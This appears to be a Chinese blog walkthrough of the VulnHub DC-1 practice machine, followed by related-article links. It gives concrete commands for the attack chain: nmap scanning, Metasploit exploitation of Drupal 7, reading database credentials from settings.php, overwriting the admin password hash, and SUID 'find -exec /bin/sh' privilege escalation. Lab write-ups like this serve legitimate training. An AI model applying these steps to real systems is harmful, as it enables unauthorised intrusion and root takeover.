综合靶场DC

最新推荐文章于 2024-10-03 13:32:34 发布
最新推荐文章于 2024-10-03 13:32:34 发布
阅读量742 收藏 6
点赞数 22
文章标签: c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zsh15203703171/article/details/142518485
版权

综合靶场 DC-1通关基本教程

一;环境搭建

  1. 下载靶场环境,靶场下载地址为:https://download.vulnhub.com/dc/DC-1.zip
  2. 打开虚拟机找到你下载的那个文件并创建DC-1虚拟机

二;渗透靶场

  1. 在kali的root页面输入:ifconfig查看IP地址.
  1. 然后就可以搭建靶场了,靶场的IP为:XXX.XXX.XXX/24

我们寻找这个靶机的真实IP为:nmap -sP 1 XXX.XXX.XXX.XXX /24

-sP不扫描端口,只扫描存活主机,本质上是Ping扫描,能Ping通有回包,就判定主机在线

  1. 接下来就是信息收集:探索端口以及服务

nmap -A -p- -v 192.168.XXX.XXX

-A 综合性扫描

-v 冗余模式,推荐使用这个选项,它就会给出扫描过程中的详细的信息

会发现你的端口开通各种服务,然后去访问web站点你会发现它是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7


我们可以利用MSF渗透

典型的drupal,启动Metersploit  MSF存在drupal模块,尝试使用msf渗透

1.MSF简单命令介绍

msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set RHOST   远程主机ip

run            攻击

3.进入MSF控制台搜索drupal模块

进入MSF控制台msfdb run

搜索drupal模块search drupal

  1. 模块测试

我们用2018的来测试。

  1. 之后我们就可以设置靶机IP来运行msf

然后来执行whoami

我们就可以发现是www-data权限

然后进入home目录,发现flag4.txt文件,提示需要让我们提升权限

我们可以使用python反弹一个交互式shell

输入:python -c "import pty;pty.spawn('/bin/bash')"

显示了当前路径

我们会发现flag1文件

    查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

我们发现flag2

    Drupal的默认配置文件为

/var/www/sites/default/settings.php

  查看文件内容

cat /var/www/sites/default/settings.php

    发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件

   

 我们先进入数据库查看

'username' => 'dbuser',

'password' => 'R0ck3t',

mysql -u dbuser -p

    查看数据库,切换到drupaldb数据库

 我们查看查找默认的Drupal user 表

select * from users;

    就会发现admin信息

解决的方法:可以置换drupal密码

进入www目录

quit;

站点路径下执行

php scripts/password-hash.sh 新密码

然后我们在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

把pass字段给替换

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

登录站点

    访问站点然后进行登录,密码是之前我们自己替换的,账号是admin

admin

123

成功登录

发现flag3

    登陆战点之后,找一找,发现flag3,

http://192.168.66.140/node#overlay=admin/content

    点击flag3进入,发现提示信息

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

他的大概意思是提权并提示 -exec,想到suid提权 find 命令

​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.

​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.

​ 利用特性,我们可通过SUID进行提权

 使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

发现find命令

将pass字段进行替换

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

    使用命令测试,发现为root权限

touch 123

ls

find / -name 123 -exec "whoami" \;

我们发现最后的flag文件

    我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。

find ./ -name 666 -exec "/bin/sh" \;   

whoami

ls

cd /root

ls

  然后查看cat thefinalflag.txt文件

cat thefinalflag.txt

鸡蹦有点歪
关注
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 9166
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1241
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1307
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
综合靶场DC-2
2401_87609825的博客
09-27 1000
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。与最初的DC-1一样,它是为初学者设计的。对于初学者来说,谷歌是你的朋友。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2327
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-05 1861
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
综合靶场 DC-1
2401_87609825的博客
09-25 825
要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。pty.spawn('/bin/bash')"显示了当前路径 查看www目录下文件输入cd /var/www输入ls发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件输入cat flag1.txt。1、目标:目标就是我们搭建的靶场靶场IP为:XXX.XXX.XXX.XXX/24。
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1056
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
综合靶场 DC-1 通关详解
2401_84691735的博客
09-22 484
它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。目标就是我们搭建的靶场靶场IP为:XXX.XXX.XXX.XXX/24。
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2791
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3687
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3045
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
红日靶场4
dyx0910的博客
06-29 2385
红日靶场4
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6152
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
蝶形激光器驱动(温控精度0.002°C 激光电流分辨率5uA)
洛溪之恋的博客
10-01 405
蝶形半导体激光器驱动电流的稳定性直接决定了其输出波长的稳定性,进而影响检测精度.为了满足气体浓度检测中对激光器输出波长稳定可调的要求,设计了数字与模拟电路混合的恒流驱动电路.STM32为主控芯片数控模块完成扫描AD/DA转换;模拟电路主要由负反馈运算放大、高精度CMOS管和反馈电阻构成,完成电压到电流的转换,输出至蝶形半导体激光器,实现蝶形半导体激光器恒流驱动.输出电流在0~300 mA范围内连续可调,输出驱动电流误差小于 ±0.003 mA,满足系统对恒流驱动 ±0.005 mA的误差精度要求。
跟《经济学人》学英文:2024年09月28日这期 The curse of the Michelin star
阿正的梦工坊
10-01 1010
Restaurants awarded the honour are more likely to close, research finds
69.【C语言】动态内存管理(重点)(2)
最新发布
2401_85828611的博客
10-03 475
之前通过调用malloc来分配一块内存,calloc和recalloc是来释放内存块的,让内存块可以用于后续的分配。指针p的值没有变化,而且free函数不对之前分配的内存空间赋新值,只是交换给操作系统,因此没有变化。2.有分配内存空间(,malloc,calloc,recalloc)就有释放内存空间(free)2.参数ptr指向的空间为malloc,calloc或recalloc开辟的空间。3.如果参数ptr指向的空间不是动态开辟的,那free函数的行为是未定义的。1.虽然free函数没有改变指针的值,
C(九)while循环 --- 军训匕首操情景
2401_87025655的博客
09-30 2274
匕首操,oi~oi~oi~~~~~接下来的几篇推文,杰哥记录的是三大循环结构的运行流程及其变式。本篇的主角是while循环。👉。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值